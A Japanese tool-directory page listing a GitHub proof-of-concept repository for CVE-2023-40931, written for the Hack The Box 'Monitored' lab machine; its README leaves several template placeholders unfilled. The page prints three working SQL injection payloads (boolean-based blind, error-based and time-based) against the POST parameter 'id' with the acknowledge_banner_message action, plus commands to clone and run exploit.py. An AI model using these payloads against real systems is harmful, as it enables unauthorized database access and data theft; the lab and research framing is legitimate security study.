Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-40931-POC — HTB MONITORED 向けに作成された CVE-2023-40931 の Proof of Concept | Kitploit
ツール/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

HTB MONITORED 向けに作成された CVE-2023-40931 の Proof of Concept

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-40931 概念実証 (PoC) 🚨

このリポジトリには、[影響を受けるソフトウェア/システム] で特定されたセキュリティ脆弱性 CVE-2023-40931 の概念実証 (PoC) が含まれています。このリポジトリの目的は、教育および研究目的のみで脆弱性を実証することです。🛠️

免責事項 ⚠️

このプロジェクトは、教育目的および許可されたテストのみを対象としています。このコードの誤用は法的な結果を招く可能性があります。著者は、このコードによって引き起こされた誤用や損害について一切責任を負いません。システムをテストする前に、必ず適切な許可を取得してください。🔒

詳細 📋

  • CVE ID: CVE-2023-40931
  • 脆弱性タイプ: [脆弱性のタイプ、例: リモートコード実行、権限昇格]
  • 影響を受けるソフトウェア: [影響を受けるソフトウェアの名前とバージョン]
  • 深刻度: [深刻度レベル、例: Critical、High] 🚩

詳細については、公式の CVE エントリを参照してください: CVE-2023-40931。🔗

使用方法 🚀

  1. リポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    POST パラメータ 'id' は脆弱です。次のペイロードは脆弱性の悪用に成功しました:

    • ブールベースのブラインド: このペイロードは、条件文を利用してクエリの真偽値を判定し、ブール論理によるデータ抽出を可能にします。

      • ペイロード: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • エラーベース: このペイロードは、特定のエラーを発生させてデータベースのエラーメッセージを利用し、情報を抽出します。

      • ペイロード: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • 時間ベースのブラインド: このペイロードは、サーバーの応答時間を観察して時間遅延を利用し、情報を推測します。

      • ペイロード: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    これらのペイロードは、この脆弱性が SQL インジェクション攻撃に対して影響を受けやすいことを示しています。慎重に進め、テスト前に必ず適切な許可を取得してください。🔒

  2. exploit.py ファイルの指示に従って PoC を実行します。🧑‍💻

    注記: 必要な依存関係がインストールされていることを確認してください。✅

ツールをダウンロード